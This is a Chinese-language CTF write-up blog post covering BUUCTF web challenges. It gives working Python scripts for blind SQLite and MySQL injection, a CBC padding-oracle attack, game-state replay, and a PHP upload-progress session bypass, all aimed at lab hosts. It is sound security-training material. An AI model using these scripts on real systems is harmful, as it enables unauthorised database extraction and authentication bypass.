<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-corner-indicator.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="[CSAWQual 2016]i_got_id">
<meta property="og:type" content="article">
<meta property="og:title" content="vacation2">
<meta property="og:url" content="http://yoursite.com/2020/07/11/vacation2/index.html">
<meta property="og:site_name" content="be a J0K1R">
<meta property="og:description" content="[CSAWQual 2016]i_got_id">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/2.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/3.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/4.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/5.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/6.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/7.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/8.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/9.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/10.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/11.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/12.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/13.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/14.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/15.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/16.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/17.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/18.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/20.png">
<meta property="og:image" content="http://yoursite.com/2020/07/11/vacation2/19.png">
<meta property="article:published_time" content="2020-07-11T06:07:12.000Z">
<meta property="article:modified_time" content="2020-08-04T08:25:36.000Z">
<meta property="article:author" content="Peguin">
<meta property="article:tag" content="buu">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/07/11/vacation2/1.png">

<link rel="canonical" href="http://yoursite.com/2020/07/11/vacation2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>vacation2 | be a J0K1R</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="be a J0K1R" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">be a J0K1R</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/11/vacation2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="Peguin">
      <meta itemprop="description" content="敢于去想，才会有MEteor的光芒闪耀。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="be a J0K1R">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vacation2
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-07-11 14:07:12" itemprop="dateCreated datePublished" datetime="2020-07-11T14:07:12+08:00">2020-07-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-08-04 16:25:36" itemprop="dateModified" datetime="2020-08-04T16:25:36+08:00">2020-08-04</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="CSAWQual-2016-i-got-id"><a href="#CSAWQual-2016-i-got-id" class="headerlink" title="[CSAWQual 2016]i_got_id"></a>[CSAWQual 2016]i_got_id<a id="more"></a></h3><p>perlparam()任意文件读取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">if ($cgi-&gt;upload(&#39;file&#39;)) &#123;</span><br><span class="line">    my $file &#x3D; $cgi-&gt;param(&#39;file&#39;);</span><br><span class="line">    while (&lt;$file&gt;) &#123;</span><br><span class="line">        print &quot;$_&quot;;</span><br><span class="line">        print &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。而对于下面的读文件逻辑来说，如果我们传入一个ARGV的文件，那么Perl会将传入的参数作为文件名读出来。这样，我们的利用方法就出现了：在正常的上传文件前面加上一个文件上传项ARGV，然后在URL中传入文件路径参数，这样就可以读取任意文件了。</span><br></pre></td></tr></table></figure>

<img src="/2020/07/11/vacation2/1.png" class="">

<h3 id="BSidesCF-2019-Sequel"><a href="#BSidesCF-2019-Sequel" class="headerlink" title="[BSidesCF 2019]Sequel"></a>[BSidesCF 2019]Sequel</h3><p>打开是登录框，尝试注入报错只能输入字母或数字，应该是弱密码爆破了</p>
<img src="/2020/07/11/vacation2/2.png" class="">

<p>爆出账号和密码都是guest，登录，cookie发生了改变，解码看看</p>
<img src="/2020/07/11/vacation2/3.png" class="">

<p>json形式记录的信息，网页提示admin才能够看到信息，那应该就是要注出admin的账号信息了，开始以为是sql注入，后来怎么都不行，去看了wp，才知道是sqlite注入</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">out = <span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">for</span> letter <span class="keyword">in</span> string.printable:</span><br><span class="line">        tmp = out + letter</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> letter == <span class="string">'g'</span>: <span class="keyword">continue</span></span><br><span class="line">        payload2 = <span class="string">r'&#123;&#123;"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"&#123;&#125;\" limit 1) OR \"","password":"guest"&#125;&#125;'</span>.format(tmp + <span class="string">'%'</span>)</span><br><span class="line">        payload1 = <span class="string">r'&#123;&#123;"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"&#123;&#125;\" limit 1) OR \"","password":"guest"&#125;&#125;'</span>.format(tmp + <span class="string">'%'</span>)</span><br><span class="line">        payload3 = <span class="string">r'&#123;&#123;"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"&#123;&#125;\" limit 1) OR \"","password":"guest"&#125;&#125;'</span>.format(tmp + <span class="string">'%'</span>)</span><br><span class="line"></span><br><span class="line">        payload1 = base64.b64encode(payload1.encode(<span class="string">'utf-8'</span>)).decode(<span class="string">'utf-8'</span>)</span><br><span class="line">        payload2 = base64.b64encode(payload2.encode(<span class="string">'utf-8'</span>)).decode(<span class="string">'utf-8'</span>)</span><br><span class="line">        payload3 = base64.b64encode(payload3.encode(<span class="string">'utf-8'</span>)).decode(<span class="string">'utf-8'</span>)</span><br><span class="line"></span><br><span class="line">        r = requests.get(<span class="string">'http://7e95f711-c309-4bfa-b522-a0be0d9d6b06.node3.buuoj.cn/sequels'</span>, cookies=&#123;<span class="string">"1337_AUTH"</span> : payload1&#125;)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"Movie"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            out = tmp</span><br><span class="line">            sys.stdout.write(letter)</span><br><span class="line">            sys.stdout.flush()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>payload2注出表名是userinfo,payload1和payload3分别能够注出密码和用户名，登录就能拿到flag</p>
<h3 id="NPUCTF2020-web🐕"><a href="#NPUCTF2020-web🐕" class="headerlink" title="[NPUCTF2020]web🐕"></a>[NPUCTF2020]web🐕</h3><p>对于webcrypto真的是一点办法都没有，密码学太难了23333</p>
<p>这个wp写的挺好的，<a href="http://wh1sper.cn/padding-oracle-attackcbc字节翻转攻击/" target="_blank" rel="noopener">http://wh1sper.cn/padding-oracle-attackcbc%E5%AD%97%E8%8A%82%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB/</a></p>
<p>详细的就不说了，贴一下脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="comment"># b'\x97.\xda\xb8\xa5P\t\x95\xae\x9b\xf5\xbf\xe2\x8b.&lt;'</span></span><br><span class="line">CYPHERTEXT = base64.b64decode(<span class="string">"ly7auKVQCZWum/W/4osuPA=="</span>)</span><br><span class="line"><span class="comment"># initialization vector</span></span><br><span class="line">IV = <span class="string">"6666666666666666"</span></span><br><span class="line"><span class="comment"># PKCS7 16个字节为1组</span></span><br><span class="line">N = <span class="number">16</span></span><br><span class="line"><span class="comment"># intermediaryValue ^ IV = plainText</span></span><br><span class="line">inermediaryValue = <span class="string">""</span></span><br><span class="line">plainText = <span class="string">""</span></span><br><span class="line"><span class="comment"># 爆破时不断需要更改的iv</span></span><br><span class="line">iv = <span class="string">""</span></span><br><span class="line">URL = <span class="string">"http://e2806171-574c-4b88-a59c-74cfbb5d13cb.node3.buuoj.cn/index.php?method=decrypt&amp;source=1"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor</span><span class="params">(a, b)</span>:</span></span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    用于输出两个字符串对位异或的结果</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">""</span>.join([chr(ord(a[i]) ^ ord(b[i])) <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a))])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> step <span class="keyword">in</span> range(<span class="number">1</span>, N + <span class="number">1</span>):</span><br><span class="line">    padding = chr(step) * (step - <span class="number">1</span>)</span><br><span class="line">    print(step,end=<span class="string">","</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">256</span>):</span><br><span class="line">        print(i)</span><br><span class="line">        <span class="string">"""</span></span><br><span class="line"><span class="string">        iv由三部分组成：</span></span><br><span class="line"><span class="string">            待爆破位置 chr(0)*(N-step)</span></span><br><span class="line"><span class="string">            正在爆破位置 chr(i)</span></span><br><span class="line"><span class="string">            使 iv[N-step+1:] ^ inermediaryValue = padding 的 xor(padding,inermediaryValue)</span></span><br><span class="line"><span class="string">        """</span></span><br><span class="line">        iv = chr(<span class="number">0</span>)*(N-step)+chr(i)+xor(padding,inermediaryValue)</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"data"</span>: <span class="string">"ly7auKVQCZWum/W/4osuPA=="</span>,</span><br><span class="line">            <span class="string">"iv"</span>: iv</span><br><span class="line">        &#125;</span><br><span class="line">        r = requests.post(URL,data = data)</span><br><span class="line">        <span class="keyword">if</span> r.text !=<span class="string">"False"</span>:</span><br><span class="line">            inermediaryValue = xor(chr(i),chr(step)) + inermediaryValue</span><br><span class="line">            print(inermediaryValue)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">plainText = xor(inermediaryValue,IV)</span><br><span class="line">print(plainText)</span><br></pre></td></tr></table></figure>

<p>跑出FlagIsHere.php,访问，还是一层</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">bxor</span><span class="params">(b1, b2)</span>:</span> <span class="comment"># use xor for bytes</span></span><br><span class="line">    parts = []</span><br><span class="line">    <span class="keyword">for</span> b1, b2 <span class="keyword">in</span> zip(b1, b2):</span><br><span class="line">        parts.append(bytes([b1 ^ b2]))</span><br><span class="line">    <span class="keyword">return</span> <span class="string">b''</span>.join(parts)</span><br><span class="line">iv = base64.b64decode(<span class="string">"979H6BtnbZagkjEBT316rA=="</span>)</span><br><span class="line">text = <span class="string">b"piapiapiapia\x04\x04\x04\x04"</span></span><br><span class="line">result = <span class="string">b"weber\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b"</span></span><br><span class="line">middle = bxor(iv,text)</span><br><span class="line">iv = bxor(middle,result)</span><br><span class="line">print(base64.b64encode(iv))</span><br></pre></td></tr></table></figure>

<p>跑出的iv的值post过去，会给提示，buu上直接下载附件，是java反编译，用Luyten-master反编译，GitHub：<a href="https://github.com/deathmarine/Luyten/releases开箱即用" target="_blank" rel="noopener">https://github.com/deathmarine/Luyten/releases开箱即用</a></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">HelloWorld</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">final</span> String[] array)</span> </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">"\u4f17\u6240\u5468\u77e5\uff0c\u4f60\u662f\u4e00\u540dWEB\u9009\u624b\uff0c\u638c\u63e1javaweb\u4e5f\u662f\u4e00\u9879\u5fc5\u5907\u6280\u80fd\uff0c\u90a3\u4e48\u9006\u5411\u4e2ajava\u5e94\u8be5\u4e0d\u8fc7\u5206\u5427\uff1f"</span>);</span><br><span class="line">        <span class="keyword">final</span> <span class="keyword">byte</span>[] array2 = &#123; <span class="number">102</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">103</span>, <span class="number">123</span>, <span class="number">119</span>, <span class="number">101</span>, <span class="number">54</span>, <span class="number">95</span>, <span class="number">52</span>, <span class="number">111</span>, <span class="number">103</span>, <span class="number">95</span>, <span class="number">49</span>, <span class="number">115</span>, <span class="number">95</span>, <span class="number">101</span>, <span class="number">52</span>, <span class="number">115</span>, <span class="number">121</span>, <span class="number">103</span>, <span class="number">48</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">125</span> &#125;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>直接把对应的ascii值转换成字符拼接就是了</p>
<img src="/2020/07/11/vacation2/4.png" class="">

<h3 id="b01lers2020-Space-Noodles"><a href="#b01lers2020-Space-Noodles" class="headerlink" title="[b01lers2020]Space Noodles"></a>[b01lers2020]Space Noodles</h3><p>这道题挺没意思的，就是考http不同的传输方法，直接附上一篇wp：<a href="https://ctftime.org/writeup/19141" target="_blank" rel="noopener">https://ctftime.org/writeup/19141</a></p>
<hr>
<p>中间停了好多天没做题了，去准备一个上课的东西去了，那边要求，改来改去的，搞了好多天，总算准备完了，后天轮到上课，这两天得继续自己的事了</p>
<h3 id="BSidesCF-2020-Cards"><a href="#BSidesCF-2020-Cards" class="headerlink" title="[BSidesCF 2020]Cards"></a>[BSidesCF 2020]Cards</h3><p>这道题不知道咋回事，打开啥都没有，玩不了这个21点，只能是借鉴一下wp写一下了</p>
<p>每个请求都有SecretState参数，保存游戏当前状态，每次请求之后会生成新的SecretState</p>
<p>游戏赢了更新SecretState，否则不更新</p>
<p>这里要注意的是下注之后开牌要用新的SecretState，下注时分数已经扣除了</p>
<p>利用21点规则，两张牌已经是21点，直接就赢了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">start &#x3D; &quot;http:&#x2F;&#x2F;0c168e61-9d77-44d8-8a66-56e77d85d52a.node3.buuoj.cn&#x2F;api&quot;</span><br><span class="line">deal &#x3D; start + &quot;&#x2F;deal&quot;</span><br><span class="line">proxy &#x3D; &#123;&quot;https&quot;: &quot;http:&#x2F;&#x2F;127.0.0.1:1087&#x2F;&quot;&#125;#设置本地为代理</span><br><span class="line"># 开局</span><br><span class="line">state &#x3D; requests.post(start, proxies&#x3D;proxy).json()[&quot;SecretState&quot;]</span><br><span class="line">while True:</span><br><span class="line">    # 下注</span><br><span class="line">    try:</span><br><span class="line">        resp &#x3D; requests.post(deal, json&#x3D;&#123;&quot;Bet&quot;: 500, &quot;SecretState&quot;: state&#125;, proxies&#x3D;proxy).json()</span><br><span class="line">    except:</span><br><span class="line">        continue</span><br><span class="line">    if resp[&#39;GameState&#39;] &#x3D;&#x3D; &#39;Blackjack&#39;:</span><br><span class="line">        state &#x3D; resp[&#39;SecretState&#39;]</span><br><span class="line">    # print(resp[&#39;Balance&#39;])</span><br><span class="line">    if resp[&#39;Balance&#39;] &gt; 100000:</span><br><span class="line">        print(resp)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>

<img src="/2020/07/11/vacation2/5.png" class="">

<h2 id="PwnThyBytes-2019-Baby-SQL"><a href="#PwnThyBytes-2019-Baby-SQL" class="headerlink" title="[PwnThyBytes 2019]Baby_SQL"></a>[PwnThyBytes 2019]Baby_SQL</h2><p>source.zip下载源码，看到重点部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">!<span class="keyword">isset</span>($_SESSION) <span class="keyword">AND</span> <span class="keyword">die</span>(<span class="string">"Direct access on this script is not allowed!"</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">'db.php'</span>;</span><br><span class="line"></span><br><span class="line">$sql = <span class="string">'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="'</span> . $_GET[<span class="string">'username'</span>] . <span class="string">'" and password="'</span> . md5($_GET[<span class="string">'password'</span>]) . <span class="string">'";'</span>;</span><br><span class="line">$result = $con-&gt;query($sql);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">auth</span><span class="params">($user)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $_SESSION[<span class="string">'username'</span>] = $user;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">True</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">($result-&gt;num_rows &gt; <span class="number">0</span> <span class="keyword">AND</span> $row = $result-&gt;fetch_assoc() <span class="keyword">AND</span> $con-&gt;close() <span class="keyword">AND</span> auth($row[<span class="string">'username'</span>]) <span class="keyword">AND</span> <span class="keyword">die</span>(<span class="string">'&lt;meta http-equiv="refresh" content="0; url=?p=home" /&gt;'</span>)) <span class="keyword">OR</span> ($con-&gt;close() <span class="keyword">AND</span> <span class="keyword">die</span>(<span class="string">'Try again!'</span>));</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在login.php中对session进行了判断，如果没有就die</p>
<p>php.ini中有一些关于session的配置：<br>若session.auto_start=on，就会自动session初始化，但是默认是off的<br>还有一个：PHP_SESSION_UPLOAD_PROGRESS是默认开启的，看一下官方文档</p>
<img src="/2020/07/11/vacation2/6.png" class="">

<p>这个是用来检测文件上传进度的，如果同时上传一个文件，并且POST一个同名变量PHP_SESSION_UPLOAD_PROGRESS，那么就会在_SESSION中获取上传进度</p>
<p>构造post脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">'http://cec2b7d6-c5ce-4db1-917c-2231ccc67bce.node3.buuoj.cn/templates/login.php'</span></span><br><span class="line">files=&#123;<span class="string">"file"</span>:<span class="string">"123"</span>&#125;</span><br><span class="line">data=&#123;<span class="string">"PHP_SESSION_UPLOAD_PROGRESS"</span>:<span class="string">"123"</span>&#125;</span><br><span class="line">cookies=&#123;<span class="string">"PHPSESSID"</span>:<span class="string">"123"</span>&#125;</span><br><span class="line">text = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> b <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">30</span>,<span class="number">130</span>):</span><br><span class="line">        params=&#123;<span class="string">"username"</span>:<span class="string">'test" or (ascii(substr((select group_concat(secret) from flag_tbl),'</span>+str(b)+<span class="string">',1))='</span>+str(i)+<span class="string">')#'</span>,</span><br><span class="line">            <span class="string">"password"</span>:<span class="string">"test"</span>&#125;</span><br><span class="line">        a=requests.post(url=url,files=files,data=data,cookies=cookies,params=params).text</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'meta'</span> <span class="keyword">in</span> a:</span><br><span class="line">            text += chr(i)</span><br><span class="line">            print(text)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>这个脚本速度很慢，可以改成二分法</p>
<h2 id="Zer0pts2020-phpNantokaAdmin"><a href="#Zer0pts2020-phpNantokaAdmin" class="headerlink" title="[Zer0pts2020]phpNantokaAdmin"></a>[Zer0pts2020]phpNantokaAdmin</h2><p>开题，是这样的页面</p>
<img src="/2020/07/11/vacation2/7.png" class="">

<p>可以创建一个表并且往里面添加数据，是sql注入没跑了，但是不知道是哪个数据库，猜测不是mysql</p>
<p>dirsearch扫一下目录</p>
<img src="/2020/07/11/vacation2/8.png" class="">

<p>这两个页面都没有回显什么有用的信息，不知道该怎么拿源码，该试的都试过了，直接Gitlab扒下源码</p>
